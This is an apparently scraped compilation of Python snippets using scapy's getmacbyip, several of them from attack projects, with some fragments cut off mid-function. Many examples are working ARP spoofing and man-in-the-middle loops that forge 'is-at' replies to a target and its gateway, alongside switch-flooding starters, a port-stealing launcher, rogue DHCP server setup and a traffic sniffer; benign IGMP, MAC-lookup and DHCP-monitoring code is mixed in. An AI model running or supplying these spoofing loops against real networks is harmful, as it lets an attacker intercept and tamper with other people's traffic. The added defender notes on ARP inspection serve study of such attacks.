示例#1
文件: main.py 项目: ardyfeb/dns-ghoib
def exploit(gateway, ip):
    """Send one forged ARP reply towards ``ip`` and one towards ``gateway``.

    Both packets are ARP replies (op=2) whose sender IP (``psrc``) is the
    other party's address. ``hwsrc`` is not set, so scapy's default applies
    (the sending interface's address); a receiver that accepts unsolicited
    replies ends up with an IP-to-MAC binding that points at this host.

    Defender view: the wire signal is an unsolicited ARP reply that changes
    an existing IP-to-MAC mapping. Dynamic ARP Inspection on the switch or a
    static ARP entry for the gateway stops the cache update; ARP-watch style
    monitoring reports it.

    Returns:
        tuple: ``(ipmac, gmac)``, the MACs resolved for ``ip`` and
        ``gateway``. Either is ``None`` when the lookup failed.
    """
    gateway_mac = getmacbyip(gateway)
    host_mac = getmacbyip(ip)

    # Both replies are built before the first one is sent.
    forged_replies = (
        ARP(op=2, pdst=ip, psrc=gateway, hwdst=gateway_mac),
        ARP(op=2, pdst=gateway, psrc=ip, hwdst=host_mac),
    )
    for reply in forged_replies:
        send(reply, verbose=False)

    return host_mac, gateway_mac
示例#2
文件: arpspoof.py 项目: wsxq2/hack
def arpspoof(target='192.168.2.16', host='192.168.2.1', interface='eth2'):
    """Send forged ARP "is-at" replies to ``target`` and ``host`` forever.

    Every three seconds two frames are built and sent: one tells ``target``
    that ``host`` is at this interface's MAC, the other tells ``host`` that
    ``target`` is at the same MAC. The interface MAC and both peers' MACs are
    looked up again on every round. The function never returns.

    Defender view: two different IP addresses (one of them usually the
    gateway) being advertised with the same ``hwsrc`` at a fixed interval is
    the pattern ARP monitoring and Dynamic ARP Inspection key on.
    """
    while True:
        frames = []
        # (address claimed in psrc, address the reply is sent to)
        for claimed_ip, recipient_ip in ((host, target), (target, host)):
            frames.append(
                Ether() / ARP(op='is-at',
                              psrc=claimed_ip,
                              pdst=recipient_ip,
                              hwsrc=get_if_hwaddr(interface),
                              hwdst=getmacbyip(recipient_ip)))
        for frame in frames:
            sendp(frame)
        time.sleep(3)
示例#3
文件: main.py 项目: ardyfeb/dns-ghoib
def restore(gateway, ip):
    """Re-advertise the resolved MACs of ``ip`` and ``gateway`` to each other.

    Two ARP replies (op=2) are built, each carrying a freshly resolved
    ``hwsrc`` for the address named in ``psrc`` and the broadcast address as
    ``hwdst``, then both are sent. This is the step that puts the original
    IP-to-MAC bindings back into the two peers' caches.

    NOTE(review): the MACs come from ``getmacbyip`` at call time; if a lookup
    fails it returns ``None`` and the packet is still sent.
    """
    corrections = [
        ARP(op=2,
            pdst=recipient,
            psrc=owner,
            hwdst="ff:ff:ff:ff:ff:ff",
            hwsrc=getmacbyip(owner))
        for owner, recipient in ((ip, gateway), (gateway, ip))
    ]

    for reply in corrections:
        send(reply, verbose=False)
示例#4
    def igmpize(self):
        """Called to explicitly fixup the packet according to the IGMP RFC

        The rules are:
        - General:
        1.  the Max Response time is meaningful only in Membership Queries and should be zero
        - IP:
        1. Send General Group Query to 224.0.0.1 (all systems)
        2. Send Leave Group to 224.0.0.2 (all routers)
        3a.Otherwise send the packet to the group address
        3b.Send reports/joins to the group address
        4. ttl = 1 (RFC 2236, section 2)
        5. send the packet with the router alert IP option (RFC 2236, section 2)
        - Ether:
        1. Recalculate destination

        Returns:
            True    The tuple ether/ip/self passed all checks and represents
                    a proper IGMP packet. Also returned when the underlayer
                    is not IP; in that case no IP or Ethernet field is
                    touched.
            False   One or more validation checks failed. The IP and Ethernet
                    headers are left as they were; mrcode may already have
                    been zeroed by the general rule.

        The function will examine the IGMP message to assure proper format.
        Corrections will be attempted if possible. The IP header is then properly
        adjusted to ensure correct formatting and assignment. The Ethernet header
        is then adjusted to the proper IGMP packet format.
        """
        # Imported here rather than at module level (presumably to avoid a
        # circular import between the IGMP and IGMPv3 modules).
        from scapy.contrib.igmpv3 import IGMPv3
        # A missing or empty group address is treated as 0.0.0.0.
        gaddr = self.gaddr if hasattr(self, "gaddr") and self.gaddr else "0.0.0.0"  # noqa: E501
        underlayer = self.underlayer
        if self.type not in [0x11, 0x30]:                               # General Rule 1  # noqa: E501
            self.mrcode = 0
        if isinstance(underlayer, IP):
            if (self.type == 0x11):
                if (gaddr == "0.0.0.0"):
                    underlayer.dst = "224.0.0.1"                        # IP rule 1  # noqa: E501
                elif isValidMCAddr(gaddr):
                    underlayer.dst = gaddr                              # IP rule 3a  # noqa: E501
                else:
                    warning("Invalid IGMP Group Address detected !")
                    return False
            elif ((self.type == 0x17) and isValidMCAddr(gaddr)):
                underlayer.dst = "224.0.0.2"                           # IP rule 2  # noqa: E501
            elif ((self.type == 0x12) or (self.type == 0x16)) and (isValidMCAddr(gaddr)):  # noqa: E501
                underlayer.dst = gaddr                                 # IP rule 3b  # noqa: E501
            elif (self.type in [0x11, 0x22, 0x30, 0x31, 0x32] and isinstance(self, IGMPv3)):
                # IGMPv3 message: the destination set by the caller is kept.
                pass
            else:
                warning("Invalid IGMP Type detected !")
                return False
            # IP rule 5: add the Router Alert option only if it is not already present.
            if not any(isinstance(x, IPOption_Router_Alert) for x in underlayer.options):  # noqa: E501
                underlayer.options.append(IPOption_Router_Alert())
            underlayer.ttl = 1                                         # IP rule 4
            _root = self.firstlayer()
            if _root.haslayer(Ether):
                # Force recalculate Ether dst
                _root[Ether].dst = getmacbyip(underlayer.dst)          # Ether rule 1  # noqa: E501
        if isinstance(self, IGMPv3):
            self.encode_maxrespcode()
        return True
def main():
    """Parse command-line flags, then send forged ARP replies in a loop.

    Flags read from sys.argv:
        -h        print help via help_function() and do nothing else
        -i IFACE  interface whose MAC is advertised (default: conf.iface)
        -s ADDR   source address; parsed, but not used later in this function
        -d SECS   pause between rounds, converted with float() (default: 0)
        -gw       also call fake_client() on every round
        -t IP     target IP (default: empty string)

    Each flag is found by its own scan over sys.argv. The final loop has no
    exit condition.
    """
    len_arg = len(sys.argv)
    i = 0
    flag_help = True
    # First pass: '-h' anywhere on the command line wins over everything else.
    while i != len_arg:
        if sys.argv[i] == '-h':
            help_function()
            flag_help = False
            break
        i += 1

    if flag_help:
        i = 0
        interface = conf.iface
        while i != len_arg:
            if sys.argv[i] == '-i':
                # NOTE(review): no bounds check; a trailing '-i' raises
                # IndexError. The same applies to -s, -d and -t below.
                interface = sys.argv[i + 1]
                break
            i += 1

        # Default source address is taken from conf.iface, not from the
        # interface selected with -i above.
        source = get_if_addr(conf.iface)
        i = 0
        while i != len_arg:
            if sys.argv[i] == '-s':
                source = sys.argv[i + 1]
            i += 1

        i = 0
        # With the default of 0 the send loop below runs without any pause.
        delay = 0
        while i != len_arg:
            if sys.argv[i] == '-d':
                delay = sys.argv[i + 1]
                delay = float(delay)
            i += 1

        gw = False
        i = 0
        while i != len_arg:
            if sys.argv[i] == '-gw':
                gw = True
            i += 1

        i = 0
        targetIp = ""
        while i != len_arg:
            if sys.argv[i] == '-t':
                targetIp = sys.argv[i + 1]
            i += 1

        # The gateway is resolved once, before the loop.
        gatewayIP = get_gateway_ip()
        gatewayMAC = getmacbyip(gatewayIP)
        while True:

            # The interface MAC is read again on every round.
            myMac = get_if_hwaddr(interface)
            fake_gateway(targetIp, myMac, gatewayIP)

            if gw:
                fake_client(targetIp, gatewayIP, myMac, gatewayMAC)
            time.sleep(delay)
示例#6
文件: switchover.py 项目: 0x0mar/zarp
    def initialize(self):
        """Resolve the configured target's MAC and start ``self.spam`` in a thread.

        The MAC is stored in ``self.switch`` and ``self.running`` is set
        before the worker starts. The thread object is not kept, so stopping
        the worker depends on whatever ``spam`` does with ``self.running``
        (not visible here).

        Returns:
            bool: always ``True``.
        """
        util.Msg("Starting switch flood...")
        target_ip = self.config['target'].value
        self.switch = getmacbyip(target_ip)
        self.running = True

        Thread(target=self.spam).start()
        return True
示例#7
    def initialize(self):
        """Look up the target's MAC, flag the module as running, launch the worker.

        ``self.config['target'].value`` is resolved with ``getmacbyip`` and
        the result (``None`` if unresolved) is stored in ``self.switch``.
        ``self.spam`` then runs in a new, non-daemon thread.

        Returns:
            bool: always ``True``.
        """
        util.Msg("Starting switch flood...")
        self.switch = getmacbyip(self.config['target'].value)
        self.running = True

        worker = Thread(target=self.spam)
        worker.start()
        return True
def fake_gateway(ip, myMac, gatewayIP):
    """Send one ARP "is-at" reply to ``ip`` that binds ``gatewayIP`` to ``myMac``.

    Only the single host ``ip`` is addressed; its MAC is resolved first and
    used as ``hwdst``.

    Defender view: the receiver sees its gateway's IP advertised with a MAC
    other than the gateway's. A static ARP entry for the gateway on the host,
    or Dynamic ARP Inspection on the switch, keeps the reply from taking
    effect.
    """
    recipient_mac = getmacbyip(ip)
    forged_reply = ARP(op='is-at',
                       psrc=gatewayIP,
                       hwsrc=myMac,
                       pdst=ip,
                       hwdst=recipient_mac)
    send(forged_reply)
示例#9
def get_mac(tgt_ip):
    """Look up the MAC address of ``tgt_ip`` with scapy's ``getmacbyip``.

    Returns:
        The MAC string, or ``None`` when the lookup fails. In the failure
        case a message asking the user to check that the host is up is
        printed first.
    """
    resolved = getmacbyip(tgt_ip)
    if resolved is None:
        print("无法获取IP为:%s 主机的MAC地址,请检查目标IP是否存活" % tgt_ip)
        return None
    return resolved
示例#10
文件: igmp.py 项目: plorinquer/scapy
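    def igmpize(self):
        """Called to explicitly fixup the packet according to the IGMP RFC

        The rules are:
        General:
            1. the Max Response time is meaningful only in Membership
               Queries and should be zero
        IP:
            1. Send General Group Query to 224.0.0.1 (all systems)
            2. Send Leave Group to 224.0.0.2 (all routers)
            3a.Otherwise send the packet to the group address
            3b.Send reports/joins to the group address
            4. ttl = 1 (RFC 2236, section 2)
            5. send the packet with the router alert IP option
               (RFC 2236, section 2)
        Ether:
            1. Recalculate destination

        Returns:
            True    The tuple ether/ip/self passed all checks and represents
                    a proper IGMP packet. Also returned when the underlayer
                    is not IP; in that case no IP or Ethernet field is
                    touched.
            False   One or more validation checks failed. The IP and Ethernet
                    headers are left as they were; mrcode may already have
                    been zeroed by the general rule.

        The function will examine the IGMP message to assure proper format.
        Corrections will be attempted if possible. The IP header is then
        properly adjusted to ensure correct formatting and assignment. The
        Ethernet header is then adjusted to the proper IGMP packet format.
        """
        # A missing or empty group address is treated as 0.0.0.0.
        gaddr = self.gaddr if hasattr(self, "gaddr") and self.gaddr else "0.0.0.0"  # noqa: E501
        underlayer = self.underlayer
        if self.type not in [0x11, 0x30]:                               # General Rule 1  # noqa: E501
            self.mrcode = 0
        if isinstance(underlayer, IP):
            if (self.type == 0x11):
                if (gaddr == "0.0.0.0"):
                    underlayer.dst = "224.0.0.1"                        # IP rule 1  # noqa: E501
                elif isValidMCAddr(gaddr):
                    underlayer.dst = gaddr                              # IP rule 3a  # noqa: E501
                else:
                    warning("Invalid IGMP Group Address detected !")
                    return False
            elif ((self.type == 0x17) and isValidMCAddr(gaddr)):
                underlayer.dst = "224.0.0.2"                           # IP rule 2  # noqa: E501
            elif ((self.type == 0x12) or (self.type == 0x16)) and (isValidMCAddr(gaddr)):  # noqa: E501
                underlayer.dst = gaddr                                 # IP rule 3b  # noqa: E501
            else:
                warning("Invalid IGMP Type detected !")
                return False
            # IP rule 5: add the Router Alert option only if it is not already present.
            if not any(isinstance(x, IPOption_Router_Alert) for x in underlayer.options):  # noqa: E501
                underlayer.options.append(IPOption_Router_Alert())
            # IP rule 4: the docstring lists it, so apply it. IGMP messages
            # are link-local and must not be forwarded past the first hop.
            underlayer.ttl = 1
            _root = self.firstlayer()
            if _root.haslayer(Ether):
                # Force recalculate Ether dst
                _root[Ether].dst = getmacbyip(underlayer.dst)          # Ether rule 1  # noqa: E501
        # Imported here rather than at module level (presumably to avoid a
        # circular import between the IGMP and IGMPv3 modules).
        from scapy.contrib.igmpv3 import IGMPv3
        if isinstance(self, IGMPv3):
            self.encode_maxrespcode()
        return True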
示例#11
文件: arpDos.py 项目: foxhack/ICSwiki
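def getTargetMac(targetIP):
    """Resolve the MAC address of ``targetIP``, trying up to three times.

    The lookup result is returned as soon as one attempt succeeds. The
    earlier loop only inspected a result on the iteration after the lookup,
    so a MAC obtained on the third pass was thrown away and reported as a
    failure.

    Args:
        targetIP: IPv4 address to resolve.

    Returns:
        The MAC string, or ``None`` when all three lookups fail.
    """
    for _ in range(3):
        targetMac = getmacbyip(targetIP)
        if targetMac:
            print("Target: %s MAC address is %s" % (targetIP, targetMac))
            # Return the target's MAC.
            return targetMac
    print("Can't get Target:%s MAC address" % targetIP)
    return None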
示例#12
	def initialize(self):
		"""Prompt for a switch address, then start ``self.spam`` in a thread.

		An empty answer selects the broadcast MAC; anything else is passed to
		``getmacbyip`` and the result stored in ``self.switch``.

		Returns:
			The status string 'Spamming <address>', or ``None`` if anything
			raised while prompting or resolving.
		"""
		try:
			util.Msg('[enter] for broadcast')
			answer = raw_input('[!] Enter switch address: ')
			self.switch = answer

			if answer == '':
				self.switch = 'FF:FF:FF:FF:FF:FF'
			else:
				self.switch = getmacbyip(answer)
		except:
			# Bare except: also swallows KeyboardInterrupt and EOFError from
			# the prompt, not only lookup errors.
			return None

		self.running = True
		worker = Thread(target=self.spam)
		worker.start()
		return 'Spamming %s' % self.switch
示例#13
    def _get_mac_address_of_ip(self, ip_addr: IPAddress):
        """Resolve ``ip_addr`` to a MAC and return it packed by ``_pack_mac_addr``.

        IPv4 addresses are resolved with ``getmacbyip``; every other version
        value is handled as IPv6 and resolved with ``getmacbyip6``.

        Returns:
            The value of ``self._pack_mac_addr(mac)``, or ``None`` (after
            logging an error) when no MAC could be found.
        """
        if ip_addr.version == IPAddress.IPV4:
            family, resolve = socket.AF_INET, getmacbyip
        else:
            family, resolve = socket.AF_INET6, getmacbyip6

        # ip_addr.address is the packed form; inet_ntop turns it into text.
        ip_str = socket.inet_ntop(family, ip_addr.address)
        addr_str = resolve(ip_str)

        if addr_str:
            LOG.debug("IP: %s, mac: %s" % (ip_str, addr_str))
            return self._pack_mac_addr(addr_str)

        LOG.error("Coudn't find mac for IP: %s, disabling ebpf" % (ip_str))
        return None
示例#14
 def send_packet(self, tcp_packet):
     """Wrap ``tcp_packet`` in IP and Ethernet headers and send the raw frame.

     The outgoing interface is taken from the routing table for the packet's
     destination, the source MAC from that interface, and the destination MAC
     from ``getmacbyip``. The whole operation runs under ``self._lock``.

     NOTE(review): the destination MAC is looked up for the destination IP
     itself, which presumably only works for on-link destinations -- confirm.
     """
     with self._lock:
         dst_ip = tcp_packet.destination_ip
         interface = Route().route(dst_ip)[0]

         ip_packet = IPPacket(source_ip_addr=tcp_packet.source_ip,
                              destination_ip_addr=dst_ip,
                              payload=tcp_packet.serialize())
         frame = EthernetPacket(
             source_mac=get_if_hwaddr(interface),
             destination_mac=getmacbyip(dst_ip),
             protocol=ETH_P_IP,
             payload=ip_packet.serialize())

         raw_frame = frame.serialize()
         # The route is looked up a second time for the socket address.
         out_iface = Route().route(dst_ip)[0]
         self.interface_socket.sendto(raw_frame, (out_iface, ETH_P_ALL))
示例#15
文件: arpAT.py 项目: 6842H/sca
def test_agent_agent_attack():
    """Run an interactive two-way ARP spoofing session against a fixed target.

    The interface name, gateway IP and target IP are hard-coded. Two forged
    ARP replies are prepared (one for the target, one for the gateway), a
    worker thread sends them at a user-supplied interval, and a second thread
    runs a sniffer on the target's non-ARP traffic. The function then reads
    numeric commands from stdin until the worker is stopped.

    NOTE(review): both ``int(input(...))`` calls are unguarded, so a
    non-numeric answer raises ValueError. While paused, only command 2 is
    acted on; command 0 does nothing until the worker has been resumed.
    """
    netcard = 'Broadcom 802.11n 网络适配器'
    gw_ip = '192.168.123.1'
    target_ip = '192.168.123.224'
    temp = get_gw_and_self(netcard, gw_ip)
    self_ip = temp.get('self_ip')  # read but not used below
    self_mac = temp.get('self_mac')
    target_mac = getmacbyip(target_ip)
    gw_mac = temp.get('gw_mac')

    # Reply for the target: gateway IP advertised with this host's MAC.
    trick_taget = Ether(dst=target_mac, src=self_mac) / ARP(
        op=2, psrc=gw_ip, hwsrc=self_mac, hwdst=target_mac)
    # Reply for the gateway: target IP advertised with this host's MAC.
    trick_gateway = Ether(dst=gw_mac, src=self_mac) / ARP(
        op=2, psrc=target_ip, hwsrc=self_mac, hwdst=gw_mac)

    # Send interval in seconds, read from the user.
    t = int(input("请输入攻击时间间隔(秒):"))
    tricker = MTread('tricker', agent_attack_cell, trick_taget, trick_gateway,
                     t)
    tricker.start()
    # threading.Thread
    # Capture filter: everything to or from the target except ARP.
    mfilter = "!arp and host " + target_ip
    mprn = lambda pkt: pack(pkt, self_mac, target_mac, gw_mac)
    # sniffer = MTread('sniffer', snifer_shell, mfilter, mprn)
    # sniffer.start()
    threading.Thread(name='sniffer', target=snifer_shell, args=[mfilter,
                                                                mprn]).start()

    print("攻击开始,目标ip %s,目标Mac %s" % (target_ip, target_mac))
    print('您可输入数字命令控制任务:')
    print("stop trick: 0, pause trick: 1,resume trick: 2")
    f0 = 1  # running state
    while 1:
        f1 = int(input("cmd(a number): "))
        if f0 == 1:  # stop or pause
            if f1 == 1:
                tricker.pause()
                f0 = 0  # paused
                print('tricker已暂停')
            elif f1 == 0:
                tricker.stop()  # stopped
                break
        elif f0 == 0:
            if f1 == 2:
                tricker.resume()  # resume -> running
                f0 = 1
                print('tricker已恢复')
    print('已停止')
示例#16
def run():
    """Check privileges, resolve three MACs, then call ``spoof`` until Ctrl-C.

    Reads the module-level ``interface``, ``target_ip`` and ``gateway_ip``.
    The process exits with status 1 when it is not running as root, and with
    the default status of a bare ``sys.exit()`` when any of the three
    addresses cannot be resolved. On KeyboardInterrupt ``restore`` is called
    once with the target and gateway MACs before returning.
    """
    if os.geteuid() != 0:
        print("Root required for operation")
        sys.exit(1)

    # (resolver, message printed when it returns nothing), in lookup order
    lookups = (
        # Get the native MAC by specified interface
        (lambda: getmac.get_mac_address(interface),
         "The specified interface does not exist"),
        (lambda: getmacbyip(target_ip),
         "The specified target does not exist"),
        (lambda: getmacbyip(gateway_ip),
         "The specified gateway does not exist"),
    )
    resolved = []
    for resolve, failure_message in lookups:
        mac = resolve()
        if not mac:
            print(failure_message)
            sys.exit()
        resolved.append(mac)
    native_mac, target_mac, gateway_mac = resolved

    while True:
        try:
            spoof(native_mac, target_mac, gateway_mac)
            time.sleep(1.5)
        except KeyboardInterrupt:
            restore(target_mac, gateway_mac)
            return
示例#17
 def getMacAddress(self, ip="0.0.0.0"):
     """Return the MAC for ``ip``, falling back to the selected interface's MAC.

     When scapy answers with the broadcast or all-zero address, the MAC is
     read from psutil for the interface currently chosen in
     ``self.comboInterfacesBox``. Any exception is swallowed and the method
     then returns ``None``.
     """
     try:
         mac = l2.getmacbyip(ip)
         if mac not in ("ff:ff:ff:ff:ff:ff", "00:00:00:00:00:00"):
             return mac

         # tested only on Mac OS, and not working pretty well with virtual
         # interfaces, like virtualbox interfaces
         selected = self.comboInterfacesBox.currentText()
         for entry in psutil.net_if_addrs()[selected]:
             if entry.family == psutil.AF_LINK:
                 return entry.address
         # No link-layer entry found: use the second address record instead.
         return psutil.net_if_addrs()[
             self.comboInterfacesBox.currentText()][1].address
     except:
         return None
示例#18
def run(target, victim, interface):
    """Send ARP "who-has" frames carrying ``victim`` as sender IP to ``target``.

    One frame is built up front and then sent in a loop with no pause until
    the user interrupts with Ctrl-C. ``hwsrc`` is not set, so scapy's default
    applies.

    Defender view: a continuous stream of identical ARP requests from one
    port, naming an IP that belongs to another host, is visible to ARP rate
    limiting and to Dynamic ARP Inspection.

    :param target: target ip address
    :type target: str
    :param victim: victim ip address
    :type victim: str
    :param interface: interface the frames are sent on
    :type interface: str
    """
    target_mac = getmacbyip(target)
    request = Ether(dst=target_mac)/ARP(op="who-has", psrc=victim, pdst=target)
    try:
        while True:
            sendp(request, iface=interface, verbose=0)
    except KeyboardInterrupt:
        return
示例#19
def run(target, victim, interface):
    """Repeat one ARP "who-has" frame to ``target`` with ``victim`` as sender IP.

    The frame is addressed to the MAC resolved for ``target`` and is sent
    back-to-back on ``interface`` until KeyboardInterrupt, which ends the
    function silently.

    :param target: target ip address
    :type target: str
    :param victim: victim ip address
    :type victim: str
    :param interface: interface the frames are sent on
    :type interface: str
    """
    dst_mac = getmacbyip(target)
    frame = Ether(dst=dst_mac) / ARP(op="who-has", psrc=victim, pdst=target)
    while True:
        try:
            sendp(frame, iface=interface, verbose=0)
        except KeyboardInterrupt:
            break
示例#20
    def __init__(self):
        """Record the real gateway, this host's addresses and the DHCP values to offer.

        The gateway IP comes from scapy's route for 0.0.0.0 and its MAC from
        ``getmacbyip``. This host's IP on ``conf.iface`` is stored both as
        the server address and as the gateway address to hand out.

        NOTE(review): the attribute names suggest a DHCP responder that
        answers with its own address as gateway; DHCP snooping on the access
        switch is the control that blocks unauthorised DHCP servers.
        """
        gateway_ip = conf.route.route("0.0.0.0")[2]
        self.__GATEWAY_IP = gateway_ip
        self.__GATEWAY_MAC = getmacbyip(gateway_ip)

        own_ip = get_if_addr(conf.iface)
        self.__DHCPServerIp = own_ip
        self.__DHCPMac = Ether().src
        self.__dictIPS = {}
        self.__IPPool = []

        self.__fakeDNSServer = "8.8.8.8"
        self.__fakeSubnetMask = ""
        self.__fakeGatewayIP = own_ip
        # Seconds. The renewal and rebinding values are both larger than the
        # lease time itself.
        self.__leaseTime = 86400
        self.__renewalTime = 172800
        self.__rebindingTime = 138240

        self.__command = ""
def start(ip_target, output_file, interface):
    """Resolve the target, claim the PID slot in ``control_file``, start port stealing.

    ``control_file`` (relative to the working directory) holds a dict
    literal. If its ``port_stealing_pid`` entry is 0 this process writes its
    own PID there; otherwise another instance is assumed to be running and
    the process exits. The module-level ``file`` is set to ``output_file``.

    NOTE(review): the PID check and the write are not atomic, and both error
    paths exit with status 0.
    """
    global file

    mac_target = getmacbyip(ip_target)
    if mac_target is None:
        six.print_(colored("[!] ERROR - Can't locate the MAC of that IP", "red"))
        exit(0)
    file = output_file

    # Access control file to check if Port stealing is running. Write PID in
    # file if not.
    control_file = open("control_file", "r+")
    # literal_eval only accepts Python literals, so the file cannot run code.
    data = ast.literal_eval(control_file.read())
    if data['port_stealing_pid'] != 0:
        six.print_(colored("[!] ERROR - Port Stealing is running", "red"))
        control_file.close()
        exit(0)
    data['port_stealing_pid'] = getpid()
    overWriteFile(control_file, str(data))

    six.print_("[*] Port Stealing STARTED")
    port_stealing(ip_target, mac_target, interface)
示例#22
    def __init__(self):
        """Set up scan state plus the interface, IP and MAC values the class uses.

        The target and gateway IPs are hard-coded. The interface name is the
        text inside the first pair of square brackets in ``str(conf.iface)``;
        an IndexError is raised when that string contains none.
        """
        # Scan results
        self.num = -1
        self.result = []

        # Network interface
        bracketed = re.compile('\[.*?\]').findall(str(conf.iface))
        self.interFACE = bracketed[0].replace('[', '').replace(']', '')

        # IP addresses: target machine, this machine, gateway
        self.target_ip = '192.168.1.4'
        self.local_ip = get_ip_from_name(self.interFACE)
        self.gate_ip = "192.168.1.1"

        # MAC addresses: target (not resolved yet), this machine, gateway
        self.target_mac = ''
        self.local_mac = get_if_hwaddr(self.interFACE)
        self.gate_mac = getmacbyip(self.gate_ip)
示例#23
def getIPAndMac(ip_range):
    """Ping every address in ``ip_range`` and collect MAC and vendor for live hosts.

    Each address gets one ICMP echo request with a 0.3 s timeout. For hosts
    that answer with an echo reply from the same address, the MAC is resolved
    and looked up through ``Mac().search``.

    Returns:
        dict: ``str(ip)`` mapped to ``"<mac>|<vendor lookup result>"``.

    Any exception while handling a reply (including no reply at all) is
    swallowed and the address is skipped.
    """
    result_list = {}
    for ip in ip_range:
        # Show which address is being probed
        print("=检测ip=>", ip)
        # ICMP echo request with a small payload
        probe = IP(dst=ip) / ICMP() / b'HelloWorld'
        # Send it, wait up to 0.3 s for an answer, keep scapy quiet
        reply = sr1(probe, timeout=0.3, verbose=False)
        try:
            is_echo_reply = (reply.getlayer(IP).fields['src'] == ip
                             and reply.getlayer(ICMP).fields['type'] == 0)
            if not is_echo_reply:
                continue
            mac = l2.getmacbyip(ip)
            vendor = Mac().search(mac)
            entry = mac + "|" + str(vendor)
            result_list[str(ip)] = entry
            print("成功获取一个mac地址:", ip, entry)
        except Exception:
            pass
    return result_list
示例#24
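    def start(self):
        """Resolve the device's MAC, open the L2 socket and start the receiver.

        ``getmacbyip(self.sut_ip)`` is retried for up to ten seconds while
        ``self.dut_mac`` is still ``None``. On success a layer-2 socket is
        opened on ``self.sut_interface`` and bound to the module-level name
        ``socket``, the base frame (EtherType 0x6003) is prepared, and the
        receive process is started.

        The MAC check now runs before the socket is opened and the frame is
        built, so a failed lookup exits without leaving a socket open or
        constructing a frame with ``dst=None``.

        Raises:
            SystemExit: with status 1 when the MAC cannot be determined.
        """
        # NOTE(review): this rebinds the module-level name ``socket``; if the
        # file also imports the stdlib ``socket`` module, that name is
        # shadowed from here on.
        global socket

        self.recv_process = multiprocessing.Process(
            target=self.process_receive)

        end_time = time.time() + 10

        while self.dut_mac is None and time.time() < end_time:
            self.dut_mac = getmacbyip(self.sut_ip)

        if self.dut_mac is None:
            print("[!] Could not determine target MAC address from IP")
            sys.exit(1)

        socket = conf.L2socket(iface=self.sut_interface)
        self.packet = Ether(dst=self.dut_mac, type=0x6003)

        self.recv_process.start()
        # Give the sniffing process time to initialise.
        time.sleep(3)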
示例#25
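def handle_dhcp_packet(packet):
    """Report DHCP Discover, Ack and Inform messages and flag unknown hosts.

    The message type is read from the first DHCP option (1 = Discover,
    5 = Ack, 8 = Inform). Hosts whose MAC passes ``check_whitelist`` are only
    printed; all others are also written through ``print_and_log``.

    Changes against the earlier version:
      * The first option is inspected defensively. Options come straight off
        the wire, and an empty or malformed option list used to raise out of
        the callback instead of being reported as "other".
      * In the Ack branch the vendor string is printed as resolved, rather
        than being passed through ``mac_vendor.get_str`` a second time.

    Args:
        packet: a sniffed scapy packet.

    Returns:
        None.
    """
    msg_type = None
    if DHCP in packet:
        options = packet[DHCP].options
        if options and isinstance(options[0], tuple) and len(options[0]) > 1:
            msg_type = options[0][1]

    # Match DHCP discover
    if msg_type == 1:
        print('---')
        print('New DHCP Discover')
        # NOTE(review): hostname is supplied by the client and is printed and
        # logged as received; the MAC is likewise self-asserted, so a
        # whitelist match is not proof of identity.
        hostname = get_option(packet[DHCP].options, 'hostname')
        mac = packet[Ether].src

        if check_whitelist(mac):
            print(f'Whitelisted host {hostname} asked for an IP.')
            print(f'Host vendor: {mac_vendor.get_str(mac)}')
            print(f'Host MAC: {mac}')
            return

        pal_time()
        print_and_log(f"Unknown host {hostname} asked for an IP.")
        print_and_log(f'Host vendor: {mac_vendor.get_str(mac)}')
        print_and_log(f'Host MAC: {mac}')

    # Match DHCP ack
    elif msg_type == 5 and packet[BOOTP].yiaddr != '0.0.0.0':
        print('---')
        print('New DHCP Ack')

        subnet_mask = get_option(packet[DHCP].options, 'subnet_mask')
        lease_time = get_option(packet[DHCP].options, 'lease_time')
        router = get_option(packet[DHCP].options, 'router')
        name_server = get_option(packet[DHCP].options, 'name_server')

        server_mac = packet[Ether].src
        server_ip = packet[IP].src

        sus_ip = packet[BOOTP].yiaddr
        # The client's MAC is obtained by an ARP lookup of the assigned IP.
        # An unresolved lookup yields the string 'None'.
        # NOTE(review): at Ack time the client may not answer ARP for this
        # address yet -- confirm the lookup is reliable here.
        sus_mac = str(getmacbyip(sus_ip))
        sus_vendor = mac_vendor.get_str(sus_mac)

        if check_whitelist(sus_mac):
            print(
                f"DHCP Server {server_ip} ({server_mac}) acknowledged a whitelisted device on IP {sus_ip}"
            )
            print(f'Host vendor: {sus_vendor}')
            print(f'Host MAC: {sus_mac}\n')
            return

        pal_time()
        print_and_log(
            f"DHCP Server {server_ip} ({server_mac}) acknowledged unknown device on IP {sus_ip}"
        )
        print_and_log(f'Unknown host vendor: {sus_vendor}')
        print_and_log(f'Unknown host MAC: {sus_mac}\n')

        print(f"DHCP Options: subnet_mask: {subnet_mask}, lease_time: "
              f"{lease_time}, router: {router}, name_server: {name_server}")

    # Match DHCP inform
    elif msg_type == 8:
        print('---')
        print('New DHCP Inform')

        hostname = get_option(packet[DHCP].options, 'hostname')
        vendor_class_id = get_option(packet[DHCP].options, 'vendor_class_id')

        print(f"DHCP Inform from {packet[IP].src} ({packet[Ether].src}) "
              f"hostname: {hostname}, vendor_class_id: {vendor_class_id}")

    else:
        print('---')
        print('Some Other DHCP Packet')
        print(packet.summary())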
示例#26
文件: mitm.py 项目: adkevin3307/IND
    eth = Ether()
    arp = ARP(psrc=gateway_ip, hwdst=tgt_mac, pdst=tgt_ip, op="is-at")
    pkt = eth / arp
    return pkt


# Script entry point: resolve both MACs, build one forged ARP reply for the
# target and one for the gateway, then resend both once per second.
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='man in the middle')

    # Neither option is marked required, so either value may be None.
    parser.add_argument('-t', dest='targetip', type=str, help='target ip')
    parser.add_argument('-g', dest='gatewayip', type=str, help='gateway ip')

    args = parser.parse_args()

    tgt_ip = args.targetip
    tgt_mac = getmacbyip(tgt_ip)
    gateway_ip = args.gatewayip
    gateway_mac = getmacbyip(gateway_ip)

    # Wait for the operator to press Enter before anything is sent.
    input('enter')

    # arp() is called as (claimed sender IP, recipient MAC, recipient IP).
    pkt_station = arp(gateway_ip, tgt_mac, tgt_ip)
    pkt_gateway = arp(tgt_ip, gateway_mac, gateway_ip)

    # show() prints the packet itself and returns None, so each print() also
    # emits a line reading "None".
    print(pkt_station.show())
    print(pkt_gateway.show())

    # No exit condition and no step that re-advertises the real bindings.
    while True:
        sendp(pkt_station)
        sendp(pkt_gateway)
        time.sleep(1)
示例#27
import sys

from scapy.layers.l2 import Ether, ARP, sendp
from scapy.layers.l2 import getmacbyip

# Script entry point. Usage: <script> TARGET_IP HOST_IP
if __name__ == '__main__':
    # Exits with status 1 and no message when fewer than two arguments are given.
    if len(sys.argv) < 3:
        sys.exit(1)
    target_ip = sys.argv[1]
    host = sys.argv[2]
